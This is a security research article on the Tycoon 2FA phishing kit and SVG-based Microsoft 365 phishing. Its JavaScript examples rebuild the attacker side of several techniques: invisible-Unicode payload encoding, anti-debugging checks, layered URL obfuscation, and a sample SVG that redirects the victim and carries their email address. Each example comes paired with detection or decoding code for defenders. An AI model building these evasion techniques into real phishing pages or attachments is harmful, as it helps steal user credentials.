Tycoon2FA phishing kit targets Microsoft 365 with new tricks

Siti Rahmiati K.

Summary

The Tycoon 2FA phishing kit has adopted several new evasion techniques aimed at slipping past endpoints and detection systems. These include using a custom CAPTCHA rendered via HTML5 canvas, invisible Unicode characters in obfuscated JavaScript, and anti-debugging scripts to thwart inspection. The Trustwave SpiderLabs Email Security team has also identified a major spike in SVG image-based attacks, where harmless-looking graphics are being used to hide dangerous links. This article takes a closer look at these methods to better understand how this kit is evolving and what defenders should be aware of.

Tycoon 2FA

1. Obfuscation Using Invisible Unicode Characters and Proxies

Lately, the Tycoon 2FA landing pages have incorporated a clever obfuscation technique using invisible Unicode characters. This technique, when paired with JavaScript Proxy objects, is designed to complicate static analysis and defer script execution until runtime. This behavior is demonstrated in a real-world Tycoon 2FA phishing landing page, as shown in this Urlscan.io session: https://urlscan.io/result/0195c73f-bfd0-7000-8386-94b11ace6088/dom/

Tycoon is using two specific invisible Unicode characters to encode binary data:

  1. Halfwidth Hangul Filler represents binary 0

    ○ Code point: U+FFA0 (UTF-16: 0xFFA0)

    ○ UTF-8: EF BE A0

  2. Hangul Filler represents binary 1

    ○ Code point: U+3164 (UTF-16: 0x3164)

    ○ UTF-8: E3 85 A4

The screenshot below shows how these invisible Unicode characters are converted into their escaped Unicode representations using CyberChef:

Figure 3 shows the decoder: the invisible characters are mapped to 0s and 1s and joined into a binary string, which is split into 8-bit segments (bytes). Each segment is converted back into a byte, and the bytes are reassembled into the original script text. To stage a script, the attacker does the reverse: every byte of the script is expanded into eight invisible characters, so the payload survives in the page source as a string that renders as nothing at all.

The decoding mechanism is shown in figure 4 below:

As seen in figure 4, the payload travels as a property name on the obfEvaluator Proxy. The Proxy's get trap receives the invisible string when the property is accessed, runs the decoder over it and evaluates the reconstructed JavaScript. Until something reads that property, nothing is decoded, so a static scan sees only an object lookup with an apparently empty key.

This method:

  • Makes the payload invisible to the human eye.

  • Evades static analysis and simple pattern-matching.

  • Delays execution until runtime, often only when specific conditions are met.

Combined with other evasion layers, this approach adds a frustrating layer of indirection for analysts and defenders.
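The following block is an added example written for this page, not code taken from the Tycoon 2FA kit. It reproduces the encoding scheme described above (Halfwidth Hangul Filler for 0, Hangul Filler for 1, eight characters per byte), a Proxy whose property name carries the payload, and a small scanner that pulls such payloads back out of a script body. The sample script and the `alert(1)` payload are constructed for the example; the real kit passes the decoded text to eval, which this version deliberately does not do.

```javascript
// Added example (editor's illustration, not code from the Tycoon 2FA kit).
// Encoder, decoder and Proxy carrier for the two invisible Hangul fillers
// the page describes, plus a scanner that surfaces such payloads in a script.
const ZERO = '\uFFA0'; // Halfwidth Hangul Filler, UTF-8 EF BE A0 -> bit 0
const ONE = '\u3164';  // Hangul Filler, UTF-8 E3 85 A4 -> bit 1

// Attacker side: each byte of the script becomes eight invisible characters.
function encodeInvisible(text) {
  let out = '';
  for (const byte of new TextEncoder().encode(text)) {
    for (let i = 7; i >= 0; i--) out += (byte >> i) & 1 ? ONE : ZERO;
  }
  return out;
}

// Decoder: map characters to bits, cut into 8-bit groups, rebuild the bytes.
function decodeInvisible(hidden) {
  let bits = '';
  for (const ch of hidden) {
    if (ch === ONE) bits += '1';
    else if (ch === ZERO) bits += '0';
    // any other character is ignored, so noise between fillers is tolerated
  }
  const bytes = new Uint8Array(Math.floor(bits.length / 8));
  for (let i = 0; i < bytes.length; i++) {
    bytes[i] = parseInt(bits.slice(i * 8, i * 8 + 8), 2);
  }
  return new TextDecoder().decode(bytes);
}

// Proxy carrier: the property *name* is the payload. Nothing is decoded until
// some code reads obfEvaluator[<invisible string>]; the kit then passes the
// result to eval/Function. This version only returns the recovered source.
const obfEvaluator = new Proxy({}, {
  get(_target, prop) {
    return typeof prop === 'string' ? decodeInvisible(prop) : undefined;
  },
});

// Defender side: a run of 16+ filler characters (two encoded bytes) in a
// script body is a strong signal. Decode each run so the analyst can read it.
const FILLER_RUN = /[\uFFA0\u3164]{16,}/g;
function findHiddenPayloads(scriptSource) {
  return Array.from(scriptSource.matchAll(FILLER_RUN), (m) => ({
    offset: m.index,
    chars: m[0].length,
    decoded: decodeInvisible(m[0]),
  }));
}

// Constructed sample: a one-line script that hides `alert(1)` the way the
// landing page hides its real payload. In an editor the key looks empty.
const sampleScript = 'var r = obfEvaluator["' + encodeInvisible('alert(1)') + '"];';
console.log(findHiddenPayloads(sampleScript));
```

The scanner's threshold of 16 filler characters is a design choice: two encoded bytes is enough to exclude the odd stray filler in legitimate Korean text while still catching a payload of any useful length. Running it over a page's inline scripts before rendering gives an analyst the cleartext without having to let the Proxy trap execute.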

2. From Cloudflare Turnstile to Custom CAPTCHA

Previously, many phishing kits, including Tycoon 2FA, leaned on third-party CAPTCHA services like Cloudflare Turnstile. These services offered basic anti-bot protection, but they also handed defenders a fingerprint: security teams could identify and block phishing pages by the recognizable third-party elements they loaded.

Tycoon has now pivoted to a custom CAPTCHA solution, likely in an attempt to reduce its detectability and increase friction for automated analysis tools. The CAPTCHA is rendered using an HTML5 canvas element with randomized characters, background noise, and slight distortions.

A simplified version of the CAPTCHA mechanism is shown in Figure 6 below:

If CAPTCHA verification fails, a new one is generated. If it succeeds, the page sends the form data and fetches instructions from an attacker-controlled server. If the server responds with an error or an unexpected value, the script writes a base64-decoded HTML document into the page, loading a decoy instead of the credential form.

This technique is more than cosmetic; it helps Tycoon blend into legitimate login workflows while allowing the attacker to dynamically serve decoys or reroute victims.

3. Anti-Debugging JavaScript

Tycoon 2FA also includes anti-debugging scripts to hinder researchers and slow down detection:

This script:

  • Detects browser automation and analysis tooling (navigator.webdriver, PhantomJS and Burp Suite indicators)

  • Blocks dev tools shortcuts (F12, Ctrl+Shift+I, Ctrl+U, etc.)

  • Prevents right-click (disabling "Inspect Element")

  • Wraps a debugger statement in a timing check: if the elapsed time across the statement is unexpectedly long, execution was paused by an attached debugger

  • Redirects to another site (rakuten.com) if analysis is suspected

These layers of obfuscation and evasion make dynamic analysis harder and extend the lifespan of phishing campaigns.
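The block below is an added example, not the kit's own anti-debugging script. It expresses the checks listed above as functions that take `nav` and `win` as parameters rather than touching the real `navigator` and `window`, so the logic can be exercised outside a browser with constructed objects, and it adds the counter an analysis sandbox applies. The Ctrl+Shift+J and Ctrl+Shift+C shortcuts are an assumption (the page lists F12, Ctrl+Shift+I and Ctrl+U), and the headless user-agent check is an addition of this example.

```javascript
// Added example (editor's illustration, not the kit's anti-debugging script).
// Inputs are passed explicitly so the checks run outside a browser.

// 1. Automation fingerprint: the signals the kit looks for before deciding
//    the page is being analysed rather than viewed by a victim.
function automationIndicators(nav, win) {
  const hits = [];
  if (nav.webdriver === true) hits.push('navigator.webdriver');
  if (win._phantom || win.callPhantom) hits.push('PhantomJS globals');
  if (/HeadlessChrome|PhantomJS/.test(nav.userAgent || '')) hits.push('headless user agent');
  return hits;
}

// 2. Keyboard shortcuts that open developer tools or view-source. The kit
//    calls preventDefault() on these; right-click is blocked the same way.
//    (Ctrl+Shift+J/C are assumed; the page names F12, Ctrl+Shift+I, Ctrl+U.)
function isDevToolsShortcut(event) {
  const key = (event.key || '').toUpperCase();
  if (key === 'F12') return true;
  if (event.ctrlKey && event.shiftKey && ['I', 'J', 'C'].includes(key)) return true;
  if (event.ctrlKey && !event.shiftKey && key === 'U') return true;
  return false;
}

// 3. Timing check around a `debugger` statement: with nothing attached it is
//    a no-op and the gap is ~0 ms; with DevTools open execution stops there
//    and the gap exceeds the threshold.
function pausedByDebugger(thresholdMs = 100) {
  const start = Date.now();
  debugger;
  return Date.now() - start > thresholdMs;
}

// Decision: if anything looks like analysis, navigate away instead of serving
// the phishing content. The page reports rakuten.com as the destination.
function decideRedirect(nav, win, thresholdMs = 100) {
  const suspicious =
    automationIndicators(nav, win).length > 0 || pausedByDebugger(thresholdMs);
  return suspicious ? 'https://www.rakuten.com/' : null;
}

// Analyst side: a sandbox defeats check 1 by shadowing the webdriver flag
// before page scripts run (in a real browser via Object.defineProperty on
// `navigator`, injected with CDP Page.addScriptToEvaluateOnNewDocument).
function hideWebdriver(nav) {
  Object.defineProperty(nav, 'webdriver', { get: () => false, configurable: true });
  return nav;
}

// Constructed inputs standing in for a headless automation session.
const botNav = { webdriver: true, userAgent: 'Mozilla/5.0 HeadlessChrome/120.0' };
const botWin = { _phantom: true };
console.log(automationIndicators(botNav, botWin)); // three indicators before the patch
```

The timing check is the one a sandbox cannot patch away by flipping a flag; the usual answer is to run the sample with breakpoints disabled (or with `debugger` statements stripped by a proxy) and to hook `Date.now` so that the measured gap stays small even when execution is paused.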

What This Means for Defenders

The recent updates to the Tycoon 2FA kit show a clear move toward stealth and evasion. While none of these techniques are groundbreaking individually, their combined use can complicate detection and response.

  • HTML5-based visuals like the custom CAPTCHA can mislead users and add legitimacy to phishing attempts.

  • Unicode and Proxy-based obfuscation can delay detection and make static analysis more difficult.

  • Anti-debugging behaviors may hide malicious activity from researchers and automated tools.

Security teams should consider behavior-based monitoring, browser sandboxing, and a deeper inspection of JavaScript patterns to stay ahead of these tactics.

YARA Detection Rule

CyberChef Recipe to Decode the Tycoon2FA Javascript

SVG-Borne Phishing Attacks

Background of Image-based Attacks

Cybercriminals have long leveraged image-based attacks to evade security defenses. One of the earliest examples was image spam in the early 2000s, which emerged to bypass text-based detections. Over the following years, attackers adopted new image-based techniques, notably QR-code phishing during the 2010s, which grew significantly and had become a widespread threat by 2023.

Also during the 2010s, threat actors used steganography, the practice of hiding data within another file or medium, to conceal malicious code or stolen data within image files.

In 2017, Trustwave SpiderLabs identified another form of image-based attack: SVG files embedding scripts that downloaded Ursnif malware from a remote resource.

Rise in SVG-based Threats, Driven by PhaaS platforms

SVG-based attacks have sharply pivoted toward phishing campaigns, with a staggering 1800% increase in early 2025 compared to data collected since April 2024. A notable surge in campaigns was observed in Q1 of 2025, peaking in March. These are driven largely by the emergence of Adversary-in-the-Middle (AiTM) Phishing-as-a-Service (PhaaS) platforms such as Tycoon2FA, which have significantly amplified the effectiveness and prevalence of these deceptive tactics.

What is an SVG File?

SVG (Scalable Vector Graphics) files are vector-based images commonly used for crisp logos, icons, and graphics because they scale without losing quality. Unlike raster formats like JPEG or PNG, SVG files are XML (Extensible Markup Language) documents, which means they can contain interactive elements and scripts. This flexibility has made SVG files increasingly popular across websites, applications, and digital marketing platforms.

Example SVG:

The example code below is a benign SVG file that renders the Microsoft logo. It uses plain drawing elements to define the shapes and colors of the logo's graphical components and contains no script.

Rendered Microsoft logo in SVG:

How Cybercriminals Exploit SVG Files for Attacks

While SVG files are widely used in web design and branding, their ability to embed JavaScript also introduces serious cybersecurity risks.

Cybercriminals exploit this feature by inserting malicious scripts directly into SVG files. When the SVG is opened as a document in a browser (for example a saved attachment that is double-clicked), these scripts execute automatically; they do not run when an SVG is merely displayed through an HTML img tag, which is why the attacks below all rely on the victim opening the file itself. Once running, the script can redirect the victim, harvest credentials or load further content, enabling unauthorized access, data theft and identity compromise.

The primary cybersecurity risks posed by malicious SVG files include:

  • Automatic execution of concealed malicious scripts with no user interaction beyond opening the file.

  • Difficulty for conventional security filters and antivirus tools to detect and block threats effectively.

  • False sense of safety among users who typically view SVG files as harmless image content.

File Comparison: SVG vs. PDF, DOC, HTML

To better understand the threat of SVG phishing, it is helpful to compare it with other common phishing file formats such as PDF, DOC, and HTML. This comparison helps evaluate the relative risks, delivery methods, and effectiveness of each format in bypassing security measures and deceiving users.

SVG Files

SVG phishing is highly effective because SVGs can embed JavaScript that executes automatically when the file is opened. Their harmless appearance and the limited scrutiny many filters apply to image attachments further heighten their appeal as phishing vectors.

PDF Files

PDF files are frequently employed in phishing attacks due to their ubiquity in business and official communications. Although PDFs can embed malicious links or scripts, executing these threats typically requires user interaction, such as clicking a link or button within the document. Moreover, PDFs often undergo rigorous scanning by security software, diminishing their effectiveness compared to SVG files.

DOC Files

Microsoft Word documents (DOC) commonly feature phishing attempts using embedded hyperlinks paired with enticing text or images. These links are crafted to appear legitimate and urge users to click, directing them toward phishing websites designed to capture credentials. Unlike SVGs, DOC files do not inherently execute scripts automatically unless part of a macro-based attack and rely heavily on user engagement and trust.

HTML Files

HTML phishing leverages embedded scripts that execute directly in browsers, often involving complex obfuscation techniques. Despite their direct threat potential, users are usually more cautious with HTML attachments due to increased awareness about their associated risks.

Browser and Email Client Handling of SVG Files

Web browsers such as Chrome, Firefox, Safari, and Edge natively open SVG files and execute embedded JavaScript without issuing any security alert when the file is loaded as a top-level document (a saved attachment or a direct URL); only SVGs referenced from an img element or CSS are treated as inert images. This makes SVG phishing highly effective, as users receive minimal warning about the potential risks.

In contrast, desktop email clients like Outlook and Thunderbird generally do not execute scripts within SVG files. Instead, they prompt users to open these files in an external browser, inadvertently increasing phishing risks by transferring the attack vector to a less secure environment.

In-the-Wild Campaigns

While HTML and PDF attachments remain popular in phishing campaigns due to their versatility, recent activity reveals a notable shift toward the use of SVG files as an alternative delivery mechanism. This lightweight, text-based image format is increasingly exploited by threat actors to embed JavaScript-based redirection, allowing them to act as stealthy intermediaries that funnel victims to credential-harvesting pages while evading traditional security filters.

This technique has been observed across campaigns linked to AiTM PhaaS platforms such as Tycoon2FA, Mamba2FA, and Sneaky2FA—all of which specialize in intercepting credentials and bypassing multi-factor authentication.

In one observed campaign (figure 18), attackers mimic a Microsoft Teams voicemail notification to lure victims into downloading a suspicious attachment. The phishing email carries a subject and body text resembling a legitimate Teams alert.

The attachment is named to look like an audio file, so its .svg extension reads as part of a voice message rather than as a script container. When opened, its embedded redirection code sends the user to a fake Office 365 login page.

This redirection is achieved by abusing an SVG element that allows HTML, and therefore JavaScript, to run inside the image. The SVG carries obfuscated script content encoded in base64, which makes the payload harder for signature-based email security tools to spot.

As soon as the SVG loads, the script decodes the URL at runtime and appends the victim's email address as a fragment identifier (after the #). Because browsers do not send the fragment to the server, the address is available to the landing page's script without appearing in request logs or URL filters, and the whole mechanism stays hidden inside an innocent-looking .svg file.

The spoofed landing page is convincingly designed to steal user credentials under the guise of M365 login.

Further investigation linked this campaign to the Mamba2FA Phishing-as-a-Service (PhaaS) platform. Mamba2FA is known for its advanced phishing kits and MFA-bypass capabilities, offering phishing operators all-in-one solutions to intercept and steal credentials even in protected environments.

Other Variants Observed in the Wild

While the core delivery method remains consistent, embedding JavaScript within SVG files to trigger redirects, the implementations vary widely.

Some campaigns use deceptive SVG icons, such as logos or cloud document previews, to lure clicks. Others employ different obfuscation layers, including base64 encoding, character fragmentation, JavaScript encoding tricks, and junk comments inserted throughout the code to evade detection.

The redirect destinations also differ, ranging from fake login pages to credential-harvesting gateways tied to various phishing kits and infrastructure.

Variant 1. Obfuscated SVG script used by Tycoon2FA Phishing-as-a-Service

This SVG phishing variant conceals its malicious URL through multiple obfuscation layers. Appearing as a standard vector graphic with dimensions of 400×250, it contains embedded JavaScript within a CDATA-wrapped block.

CDATA (Character Data) is an XML construct that allows raw text, including special characters like angle brackets and ampersands, to be embedded without being parsed. In this case, it enables attackers to insert executable JavaScript directly into the SVG without breaking the structure, helping hide the payload from basic inspection.

The script layers a ROT13 transformation, Base64 encoding, and XOR with a fixed key so that the phishing URL only exists in cleartext at execution time. Once run, it redirects the user to the phishing destination and passes the target's email address along, so the phishing page presents it pre-filled as if the user had already typed it.
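The block below is an added example written for this page, not the script recovered from the SVG sample. The page names the three layers (ROT13, Base64, XOR with a fixed key) but not their order or the key; this example assumes the attacker applies XOR, then Base64, then ROT13, and uses the stand-in key `k3y` and a benign destination. An analyst reads the real order and key straight out of the decoding routine in the SVG and adjusts `recoverUrl` accordingly.

```javascript
// Added example (editor's illustration, not the script from the SVG sample).
// Layer order and the key "k3y" are assumptions; see the lead-in.

function rot13(text) {
  return text.replace(/[A-Za-z]/g, (c) => {
    const base = c <= 'Z' ? 65 : 97;
    return String.fromCharCode(((c.charCodeAt(0) - base + 13) % 26) + base);
  });
}

// XOR each byte with the repeating key; the same call both hides and reveals.
function xorBytes(bytes, key) {
  const k = Buffer.from(key, 'utf8');
  return Buffer.from(Uint8Array.from(bytes, (b, i) => b ^ k[i % k.length]));
}

// Attacker side: URL -> XOR -> Base64 -> ROT13. ROT13 maps letters to letters
// and leaves digits, '+', '/' and '=' alone, so the blob still looks like
// valid Base64; a filter that blindly base64-decodes it gets garbage.
function hideUrl(url, key) {
  return rot13(xorBytes(Buffer.from(url, 'utf8'), key).toString('base64'));
}

// Analyst side: peel the layers in reverse order.
function recoverUrl(blob, key) {
  const xored = Buffer.from(rot13(blob), 'base64');
  return xorBytes(xored, key).toString('utf8');
}

// What the SVG does with the result: navigate to the page and carry the
// target's address in the fragment, which the browser never sends to the
// server, so the landing page can pre-fill it without it appearing in logs.
function buildRedirect(blob, key, victimEmail) {
  return recoverUrl(blob, key) + '#' + encodeURIComponent(victimEmail);
}

// Constructed sample with a benign destination.
const KEY = 'k3y';
const blob = hideUrl('https://login.example.com/', KEY);
console.log(blob, '->', buildRedirect(blob, KEY, 'victim@example.com'));
```

The practical lesson is that none of the three layers is a cipher in any meaningful sense: ROT13 and Base64 have no key, and the XOR key has to be present in the script for the redirect to work, so a few lines of JavaScript in a sandbox recover the destination without ever letting the redirect fire.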

Variant 2. Logo-Based Staging and Redirect Technique

This SVG file combines graphical content with an embedded redirection script, creating a seemingly harmless image that covertly navigates users to another website.

The file defines an SVG image with specific dimensions (234×48 pixels) and a defined viewBox. It uses multiple drawing elements to form shapes or text, all rendered in a uniform color, so that it passes as a logo.

Embedded within a CDATA-wrapped block, the JavaScript code defines a redirect function that sets a specific URL target. When the SVG loads in the browser (triggered by window.onload), the script automatically executes, immediately redirecting users to the intended phishing destination, which in this case, is a Google Drawings page.
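The following block is an added example, not a Trustwave tool, and it illustrates the sections on how SVG files are abused, the Teams voicemail campaign, and the two variants above. It is a mail-gateway style triage of an SVG attachment: regex checks for the active-content features described on this page (script elements, event handlers such as window.onload, foreignObject, javascript: links, CDATA wrappers, runtime base64 decoding, redirect primitives) plus recovery of URLs hidden in base64 literals. Both SVGs in the block are constructed for the example; the "malicious" one redirects to example.com.

```javascript
// Added example (editor's illustration, not a Trustwave tool). Static triage
// of an SVG attachment for the active-content features the page describes.

const CHECKS = [
  { id: 'script-element',  re: /<script\b/i, why: 'executable script inside the image' },
  { id: 'event-handler',   re: /\bon(load|begin|click|error|mouseover)\s*=/i, why: 'event handler (attribute or window.onload)' },
  { id: 'foreign-object',  re: /<foreignObject\b/i, why: 'HTML embedded via foreignObject' },
  { id: 'javascript-href', re: /href\s*=\s*["']\s*javascript:/i, why: 'javascript: URL in a link' },
  { id: 'cdata',           re: /<!\[CDATA\[/, why: 'CDATA block, commonly used to wrap the script' },
  { id: 'atob',            re: /\batob\s*\(/, why: 'runtime base64 decoding' },
  { id: 'redirect',        re: /\b(location\.(href|replace|assign)|window\.open)\b/, why: 'navigation primitive' },
];
// Findings that by themselves mean the file is active content, not an image.
const ACTIVE = new Set(['script-element', 'event-handler', 'foreign-object', 'javascript-href']);

function scanSvg(svgText) {
  const findings = CHECKS.filter((c) => c.re.test(svgText)).map((c) => ({ id: c.id, why: c.why }));
  // Decode every quoted base64-looking literal and keep the ones that are URLs,
  // so the analyst sees the destination without executing the script.
  const urls = [];
  for (const m of svgText.matchAll(/["']([A-Za-z0-9+/]{16,}={0,2})["']/g)) {
    const decoded = Buffer.from(m[1], 'base64').toString('utf8');
    if (/^https?:\/\//.test(decoded)) urls.push(decoded);
  }
  return { active: findings.some((f) => ACTIVE.has(f.id)), findings, urls };
}

// Benign constructed sample: four coloured squares, nothing but drawing elements.
const benignSvg = `<svg xmlns="http://www.w3.org/2000/svg" width="234" height="48" viewBox="0 0 234 48">
  <rect x="0"  y="0"  width="22" height="22" fill="#f25022"/>
  <rect x="24" y="0"  width="22" height="22" fill="#7fba00"/>
  <rect x="0"  y="24" width="22" height="22" fill="#00a4ef"/>
  <rect x="24" y="24" width="22" height="22" fill="#ffb900"/>
</svg>`;

// Malicious constructed sample in the shape the page describes: a voice-message
// decoy, a CDATA-wrapped script, a base64-hidden URL decoded at runtime and the
// victim's address appended as a fragment on window.onload.
const HIDDEN = Buffer.from('https://example.com/').toString('base64');
const maliciousSvg = `<svg xmlns="http://www.w3.org/2000/svg" width="400" height="250">
  <rect width="400" height="250" fill="#eeeeee"/>
  <text x="20" y="130">Voice message (00:42)</text>
  <script><![CDATA[
    var u = atob("${HIDDEN}");
    window.onload = function () { location.replace(u + "#victim@example.com"); };
  ]]></script>
</svg>`;

console.log(scanSvg(benignSvg));
console.log(scanSvg(maliciousSvg));
```

Regex triage like this is a first pass, not a parser: the obfuscation layers described above (ROT13, XOR, string fragmentation, junk comments) can hide the base64 literal and the redirect call from the pattern checks, but the `<script`, `on*=` and `<foreignObject` tests hold up regardless, because the file cannot run code without one of them. A gateway that wants to allow genuinely static SVG logos can use `active === false` as the pass condition and quarantine everything else.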

Conclusion

The rise in SVG phishing suggests that threat actors are continuously expanding their tactics to bypass security measures beyond QR codes and the traditional methods, including links, HTML, and document-based attacks. Many of these campaigns are facilitated by phishing kits that operate as PhaaS platforms, making them more accessible and scalable for cybercriminals. Awareness and proactive security measures are vital in combating this subtle yet increasingly prevalent threat.

To effectively combat this increasingly prevalent threat, users and organizations should:

  • Consider blocking or flagging SVG attachments: Evaluate the option of blocking emails with SVG attachments or, at a minimum, flagging them with a warning.

  • Be cautious with attachments and links: Treat unexpected files and embedded links with suspicion, especially if they come from unknown or unverified sources.

  • Verify authenticity: Double-check senders and content, especially with urgent or unsolicited messages.

  • Train employees regularly: Provide ongoing education on phishing trends and techniques to help users recognize and respond to threats.

  • Use advanced protection: Implement robust filtering and threat-detection systems to proactively block malicious threats like SVG-based attachments. Tools like Trustwave MailMarshal offer layered protection against email threats.

  • Implement MFA methods with extra layers: Strengthen defenses with phishing-resistant methods like FIDO2 and implement conditional access, continuous authentication, and session monitoring.
